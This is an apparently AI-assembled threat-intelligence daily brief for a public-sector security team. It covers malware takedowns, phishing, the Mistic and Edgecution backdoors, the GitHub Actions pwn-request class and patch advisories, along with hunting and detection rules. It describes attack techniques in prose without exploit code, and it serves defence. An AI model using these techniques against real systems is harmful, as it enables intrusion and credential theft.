CTI Daily Brief — 2026-06-25

0. TL;DR

Operation Endgame dismantles Amadey and StealC MaaS infrastructure — a Europol-coordinated action on 24 June took down 326 servers and 142 domains, recovered ~27 million stolen credentials from 385,000+ systems and froze EUR 41M (BleepingComputer, 2026-06-24); both families are commodity initial-access and credential-theft stages that feed ransomware affiliates active against European targets (Microsoft, 2026-06-24).
NCSC-CH flags an active Microsoft 365 "voicemail" phishing wave in Switzerland — Week 25 review documents dual-path ZIP-borne infostealer / fake-login credential theft against M365 tenants, with downstream BEC and chain-phishing once a mailbox is taken; the ZIP-as-audio lure is the key detection discriminator (NCSC-CH, 2026-06-23).
Two new initial-access-broker toolsets surface — Mistic and Edgecution — Symantec details Mistic, sideloaded via a signed Microsoft Defender binary so its activity reads as legitimate Defender behaviour (Symantec, 2026-06-24); Zscaler details Edgecution, a malicious Edge extension that bridges the browser sandbox to a host Python backdoor via the Native Messaging API (today's deep dive) (Zscaler, 2026-06-23).
Patch your own tooling — MISP 2.5.42 closes six CVEs including two site-admin RCE paths (rdkafka plugin-load and ndjson log injection) plus Azure-AD auth and access-control hardening, directly affecting the threat-intel platform most EU CERTs/CSIRTs run (MISP, 2026-06-22).
"Cordyceps" shows the GitHub Actions pull_request_target pwn-request class is still widely live — 300+ of 30,000 scanned high-impact repos were fully exploitable from a single unauthenticated PR, including Microsoft Azure Sentinel and Google's ADK; actions/checkout v7 ships safer defaults but pinned older workflows remain exposed (Novee Security, 2026-06-23).

1. Active Threats, Trending Actors, Notable Incidents & Disclosures

NCSC-CH: active Microsoft 365 "voicemail" phishing wave in Switzerland delivers infostealers and harvests M365 credentials

Switzerland's National Cyber Security Centre reported a higher-than-usual volume of a dual-path Microsoft 365 / OneDrive-for-Business phishing campaign in its Week 25 review (NCSC-CH, 2026-06-23). In the malware-delivery variant the email carries a ZIP "audio" attachment that, when run, installs an infostealer harvesting browser credentials, session cookies and wallet data; in the credential-harvest variant a fake Microsoft login page with a simulated audio player ("Play voicemail as guest") captures the M365 username and password. NCSC-CH notes that a compromised mailbox is then used to read live business email and run chain-phishing and BEC fraud from a recognised sender replying inside an existing thread (T1114.003, T1098), and that stolen credentials are frequently resold and resurface in targeted follow-up attacks weeks later. Why it matters to us: Swiss public-sector staff are direct recipients. The discriminator is mechanical — legitimate voicemail notifications deliver .wav/.mp3, never a ZIP. Phishing-resistant MFA (FIDO2 / certificate-based Conditional Access) defeats the credential-theft path even when the lure succeeds; hunt M365 audit logs for inbox-rule and forwarding-rule creation within minutes of a sign-in from a new country/ASN.

Operation Endgame dismantles the Amadey and StealC malware-as-a-service backbone

A Europol-coordinated law-enforcement and private-sector action on 24 June 2026 took down the shared infrastructure of Amadey and StealC — two of the dominant commodity malware-as-a-service families that form the pre-ransomware infection chain (Microsoft, 2026-06-24 · Europol, 2026-06-24). 326 servers and 142 domains were seized, ~27 million credentials stolen from 385,000+ systems recovered, and EUR 41M in crypto frozen (BleepingComputer, 2026-06-24). Amadey (active since 2018) is a modular C++ loader with 29+ commands, scheduled-task persistence and payload staging; StealC is a C++ infostealer-MaaS harvesting browser credentials, cookies, wallets and desktop clients over RC4-encrypted HTTP. ESET contributed RC4 keys and clustering that identified 53 Amadey and 73 StealC clusters (ESET, 2026-06-24); Proofpoint and IBM X-Force documented a directory-traversal flaw in StealC's C2 panel (its filename sanitiser failed to strip forward-slashes), and an exploit built on it was used by global law enforcement to map and access affiliate infrastructure (Proofpoint/IBM X-Force, 2026-06-24). This is a distinct action from the SocGholish/TA569 phase covered on 2026-06-19. Why it matters to us: Detecting Amadey delivery (ClickFix fake-CAPTCHA, SEO poisoning) and StealC exfiltration is a real ransomware pre-emption opportunity. Hunt scheduled-task creation (EID 4698) by browser/Office parents from %APPDATA% paths, and browser-process → mshta.exe/wscript.exe chains with temp-path arguments.

"Mistic" backdoor: signed-Defender DLL sideloading and in-memory tradecraft by access broker Woodgnat/KongTuke

Symantec disclosed Backdoor.Mistic (also tracked as MLTBackdoor), deployed since April 2026 by initial-access broker Woodgnat (a.k.a. KongTuke) that sells footholds to ransomware affiliates including Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta (Symantec, 2026-06-24 · SecurityWeek, 2026-06-24). Mistic achieves DLL sideloading via a digitally-signed Microsoft Defender executable (MpExtMs.exe) loading a malicious EndpointDlp.dll (T1574.002, T1036.005), so its activity reads as legitimate Defender behaviour to EDR. Per Symantec it also supports in-memory tradecraft and file manipulation/arbitrary code execution with a kill switch for stealth. Delivery uses ClickFix / FileFix / CrashFix lures (fake CAPTCHAs, browser-crash pages, Teams IT-helpdesk impersonation directing victims to run PowerShell). Why it matters to us: The downstream affiliates are all active public-sector ransomware actors. Detection is precise: legitimate Defender DLPs load from %ProgramFiles%\Windows Defender\ under a Microsoft certificate — any EndpointDlp.dll loaded from a user-writable path or with a non-Microsoft signature is high-confidence (Sysmon EID 7). Pair with EID 1 parent-chains for PowerShell spawned by Teams/Office clients.

2. Trending Vulnerabilities

3. Research & Investigative Reporting

"Cordyceps" — the GitHub Actions `pull_request_target` pwn-request class is still widely exploitable at scale

Novee Security published "Cordyceps", an empirical study of a long-known but persistently unmitigated class of GitHub Actions CI/CD vulnerabilities (Novee Security, 2026-06-23 · SecurityWeek, 2026-06-24). The pattern: a pull_request_target (or comment-triggered) workflow runs with the base repository's write permissions and secrets while checking out or otherwise consuming untrusted fork-PR content, letting an attacker inject code into a privileged CI context (T1195.002). Of ~30,000 high-impact repositories scanned, 654 were flagged and 300+ confirmed fully exploitable — including Microsoft (Azure Sentinel), Google (AI Agent Development Kit), Apache (Doris), Cloudflare (Workers SDK) and the Python Software Foundation (Black) — with exploitation requiring only a free GitHub account and a single PR. Successful exploitation can yield the org's GitHub App key, cloud repository authority, or the ability to publish attacker-controlled packages to trusted registries. GitHub shipped actions/checkout v7 on 18 June with safer pull_request_target defaults that refuse to fetch fork-PR head commits in unsafe patterns (GitHub Changelog, 2026-06-18), but organisations pinning older action versions or running self-managed Enterprise Server are not yet protected. Audit .github/workflows/*.yml for pull_request_target triggers that reference any ${{ github.event.pull_request.* }} context in run:/env: steps; scope GITHUB_TOKEN to contents: read by default; and split build/test onto the unprivileged pull_request trigger.

4. Updates to Prior Coverage

UPDATE: Klue/Icarus Salesforce OAuth breach — BeyondTrust and LastPass added to the named-victim list

UPDATE (originally covered 2026-06-19): BeyondTrust and LastPass have both disclosed that business-contact and sales-related data was exfiltrated from their Salesforce environments via the compromised Klue integration, pushing the confirmed named-victim count past 14 (SecurityWeek, 2026-06-24 · Help Net Security, 2026-06-24).

The BeyondTrust exposure is the notable delta: a privileged-access-management vendor losing its CRM contact and support-case data to a SaaS supply-chain compromise illustrates that security-vendor customer lists are a deliberate targeting priority for the Icarus extortion crew. LastPass states customer vaults were not affected. Salesforce had already disabled the Klue Battlecards connection on 17 June (The Hacker News, 2026-06-19). Any organisation receiving a Salesforce "Connected App disabled" notice for Klue should treat it as an incident trigger and audit Event Log File ApiTotalUsage / ApiAnomalyEventStore records for bulk REST API reads in the June 11–17 window (T1199, T1528, T1213.003).

5. Deep Dive — Edgecution: abusing the Chrome/Edge Native Messaging API as a browser-sandbox-to-host bridge

Background. Browser-extension-to-host pivoting is not a new idea — the Native Messaging API (the stdio IPC channel that lets a browser extension talk to a registered local executable) has been a documented abuse surface for years, and EDR coverage of browser child-processes remains uneven. What Zscaler ThreatLabz documents in Edgecution is this class turned into a working, in-the-wild initial-access toolset operated by the Payouts Kings group (Zscaler ThreatLabz, 2026-06-23 · BleepingComputer, 2026-06-24).

Initial access. The chain begins with a Microsoft Teams social-engineering lure: attackers impersonate IT support and direct the victim to a fraudulent Outlook "update" portal (T1204.002 User Execution: Malicious File, preceded by T1656 impersonation). The download is a ZIP bundling an embedded Python 3.13.3 runtime, a malicious Edge extension presented as an "Edge Monitoring Agent", and the native-messaging host components that register the extension-to-executable channel.

Sandbox-to-host bridge. The extension runs inside a headless (hidden-window) Edge instance invisible to the user (T1564.003 Hide Artifacts: Hidden Window), beacons to C2 hosted on cloudfront.net subdomains over HTTPS (T1071.001 Application Layer Protocol: Web Protocols), and relays received commands across the Native Messaging stdio channel (T1559 Inter-Process Communication) to a Python backdoor running on the host. The design point is evasion: controls that watch the browser process tree but not the native-messaging-host child process never see the host commands cross the boundary.

On-host capability. The Python backdoor (T1059.006 Command and Scripting Interpreter: Python) implements shell and PowerShell command execution, arbitrary code execution, file writes, process enumeration and system reconnaissance — a full IAB foothold from which ransomware affiliates can be sold access. Zscaler reports the observed C2 used cloudfront.net subdomains hosted on AWS, which blend with legitimate CDN traffic.

Hunt and detection concepts. (1) Process-tree rule: msedge.exe spawning a native-messaging host executable followed by a Python interpreter invocation is the kill-chain signature — the host process is registered under HKCU\Software\Microsoft\Edge\NativeMessagingHosts\. (2) Registry monitoring: additions under that key by anything other than a legitimate installer (Sysmon EID 13). (3) Process telemetry: a headless/hidden Edge instance launched outside normal user interaction (Sysmon EID 1, command-line flags indicating an automation/headless profile). (4) Network: CloudFront-subdomain beaconing originating from msedge.exe or a Python child in an environment that does not normally use those endpoints.

Hardening. Enterprise browsers should restrict extension installation to approved publisher IDs via Group Policy (ExtensionInstallAllowlist, and BlockExternalExtensions), and allow-list Native Messaging hosts explicitly. Blocking user-profile (HKCU) Native Messaging host registration via AppLocker/WDAC removes this persistence and bridging path. Because the entry point is a Teams IT-helpdesk lure, the same control that blunts ClickFix/FileFix — preventing users from running attacker-supplied scripts and constraining who can deliver Teams messages from outside the tenant — applies here too.

6. Action Items

Upgrade MISP to 2.5.42 now if you run a MISP instance — six CVEs including two site-admin RCE paths (rdkafka plugin-load CVE-2026-56447, CVSS 9.3; and an ndjson log-path RCE). Verify file ownership on APP/tmp/ and the web root and audit the admin trail for Kafka/log-path changes. (See § 2.)
Audit GitHub Actions workflows for the Cordyceps pattern — flag every pull_request_target trigger that consumes ${{ github.event.pull_request.* }} content; adopt actions/checkout v7 or pin a safe configuration; scope GITHUB_TOKEN to contents: read; rotate secrets in affected repos. (See § 3.)
Hunt for signed-Defender DLL sideloading (Mistic) — alert on EndpointDlp.dll loaded from a user-writable path or with a non-Microsoft signature (Sysmon EID 7), and on PowerShell spawned by Teams/Office clients. (See § 1.)
Hunt for Native-Messaging bridging (Edgecution) — msedge.exe → native-messaging host → Python interpreter chains, and HKCU\...\Edge\NativeMessagingHosts\ additions by non-installers; allow-list extensions and native-messaging hosts via Group Policy / WDAC. (See § 5.)
Reinforce M365 phishing controls (NCSC-CH wave) — flag ZIP attachments masquerading as voicemail audio, enforce phishing-resistant MFA via Conditional Access, and hunt inbox-rule / forwarding-rule creation shortly after sign-ins from new countries/ASNs. (See § 1.)
Audit Salesforce connected-app OAuth tokens (Klue/Icarus) — review Event Log File ApiTotalUsage / ApiAnomalyEventStore for bulk REST reads in the June 11–17 window and minimise token scopes. (See § 4.)

7. Verification Notes

Items dropped:
- DifyTap (Dify cross-tenant flaws, CVE-2026-41947 / -41948 / -41949 / -41950) — already evaluated and dropped to § 7 on 2026-06-23; the grounds still hold (all paths require an authenticated editor/tenant account, no in-the-wild exploitation), so it does not clear the § 2 inclusion bar despite a stronger primary (Zafran) now being available.
- OXLoader (Elastic Security Labs) — single-substantive-source and surfaced by two sub-agents with conflicting publication dates (19 vs 23 June) and conflicting technical descriptions (.reloc-section shellcode staging + anti-VM checks vs. process-hollowing + clipper); dropped pending a single reconcilable account.
- Mini-Shai-Hulud / Miasma / Hades PyPI worm wave (Socket Security) — the substantive primary is dated 8 June, outside the 36 h window (one sub-agent's 24 June date appears to be the date of a Schneier commentary follow-up, not the primary); the Shai-Hulud family has prior coverage, so this is held for a cleaner in-window development.
- DoJ seizure of Huione Group laundering infrastructure ($31B) — significant law-enforcement action but no patch/hunt/block/detect decision for a public-sector SOC; out of scope under less-is-more.
- GhostSender / Ghost-Sender (Exchange Online sender spoofing, InfoGuard / Abnormal) — strong CH relevance, but the substantive InfoGuard research is dated 9 June (outside the 36 h window) and the two sub-agents returned materially different mechanism descriptions (direct-to-EOP submission bypassing the external MX gateway vs. cross-tenant outbound-relay abuse); dropped rather than publish an unreconciled mechanism. The in-window CH email-threat signal is carried by the NCSC-CH Week 25 item in § 1.
- Cacti 1.2.31 (CVE-2026-39893 and the wider 1.2.31 cluster) — the only citable substantive source (Cacti GHSA-69gg-mjfm-jjpc) is dated 2026-06-19, outside the 36 h window, and covers only CVE-2026-39893; the additional CVEs and the 24-June ENISA EUVD indexing that would anchor it in-window are on a blocked-URL search page that cannot be cited inline. Dropped to avoid both an out-of-window item and over-attribution to a single advisory. Still worth patching: pre-auth SQLi (CVSS 9.8) reachable via default guest graph-viewing.
- Arista EOS tunnel-decapsulation flaw (CVE-2026-7473) — initially drafted as a § 4 UPDATE on the back of an apparently-fresh Eclypsium analysis, but verification established the Eclypsium article is dated 2026-06-16 and the SecurityWeek piece 2026-06-10 — both outside even the 72 h developing window, with no in-window delta. The CVE was already covered on 2026-06-10 (KEV-listed, Arista SA-0137 mitigation); there is no new development this run, so it is dropped rather than recycled. Operators on EOS 4.x should still treat SA-0137 mitigation as permanent (no code fix planned).
Single-source (national-CERT carve-out): NCSC-CH Week 25 voicemail-phishing item (§ 1) rests on the NCSC-CH Wochenrückblick as primary disclosing authority for Switzerland (PD-5 carve-out).
Recency edge: the MISP 2.5.42 item (§ 2, released 2026-06-22) sits just beyond the 36 h standard window but inside the 72 h developing window; retained for its direct relevance to the threat-intel platform CH/EU public-sector SOCs run.
Contradiction: Operation Endgame scale figures differed across sub-agents — one reported 296 servers / 66 domains / 25.6M credentials; the brief uses 326 servers / 142 domains / ~27M credentials / EUR 41M, the figure independently corroborated by Microsoft, ESET and BleepingComputer (the latter quoted verbatim).
Verification: iteration 1 (cti-verification, Opus) returned NEEDS_FIXES (truth 6 / editorial 1 / advisory 1) — corrected a "no CVE published" error + dedup miss on the Arista flaw (CVE-2026-7473), narrowed MISP CVSS to the single GHSA-sourced score, dropped the over-attributed Cacti item, softened the Mistic capability framing, fixed the Operation Endgame directory-traversal attribution (researchers documented it; law enforcement used it), and rebound the Edgecution CloudFront quote. Iteration 2 (cti-verification-alt, Sonnet, with prior-iteration deltas) returned NEEDS_FIXES (truth 1 / editorial 1 / advisory 1) — removed a residual "in-memory BOF execution" phrase from the Mistic heading, and on finding the Arista sources are dated 06-16 / 06-10 (out of window) dropped the Arista item entirely rather than republish stale coverage. Iteration 3 (cti-verification, Opus, cold read) returned CLEAN (truth 0 / editorial 0; two non-blocking F11 advisories on quote-source labelling left as residual).
Tooling: tools/source_health.py did not finish within its time budget this run (full-source network probe); the committed state/source_health.json is the prior snapshot. No impact on the brief.
Coverage gaps: databreaches-net (HTTP 403 on the bridge for a third consecutive run — persistent transport block, not a dead source); cert-eu, cert-fr-avis, ncsc-ch-security-hub, ncsc-nl, cisa-kev, msrc (bridge-reachable but no net-new in-window items); mandiant-gtig, sophos-xops (feed fetch failures, exit code 1); inside-it-ch (Cloudflare-gated); ico-uk, cnil-fr (no in-window enforcement actions); broadcom-symantec, zscaler-threatlabz (SPA bodies unreadable from the bridge — content confirmed via corroborating publishers).

On this page